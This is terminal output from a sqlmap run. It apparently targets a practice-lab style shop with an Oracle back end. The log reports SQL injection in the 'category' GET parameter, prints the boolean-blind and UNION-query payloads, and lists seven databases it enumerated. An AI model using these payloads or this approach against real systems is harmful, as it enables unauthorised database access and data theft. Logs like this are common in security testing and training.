[32mRunning sqlmap...[0m
[36mThe back-end DBMS is [33mOracle[0m
[33mChecking for vulnerabilities...[0m
[36m=== Vulnerabilities Found ===[0m
Parameter: category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=Gifts' AND 2854=2854 AND 'iEge'='iEge

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: category=Gifts' UNION ALL SELECT CHR(113)||CHR(118)||CHR(107)||CHR(120)||CHR(113)||CHR(107)||CHR(120)||CHR(72)||CHR(101)||CHR(120)||CHR(103)||CHR(122)||CHR(98)||CHR(74)||CHR(118)||CHR(66)||CHR(112)||CHR(90)||CHR(65)||CHR(116)||CHR(75)||CHR(65)||CHR(114)||CHR(68)||CHR(72)||CHR(78)||CHR(82)||CHR(67)||CHR(104)||CHR(109)||CHR(73)||CHR(113)||CHR(120)||CHR(109)||CHR(88)||CHR(90)||CHR(120)||CHR(99)||CHR(113)||CHR(80)||CHR(77)||CHR(86)||CHR(116)||CHR(82)||CHR(65)||CHR(113)||CHR(98)||CHR(122)||CHR(107)||CHR(113),NULL FROM DUAL-- dulj
---
[36m=== Extracted Databases ===[0m
available databases [7]:
[*] APEX_040000
[*] CTXSYS
[*] MDSYS
[*] PETER
[*] SYS
[*] SYSTEM
[*] XDB
[36mTerminal output saved to ../../userFolders[0m
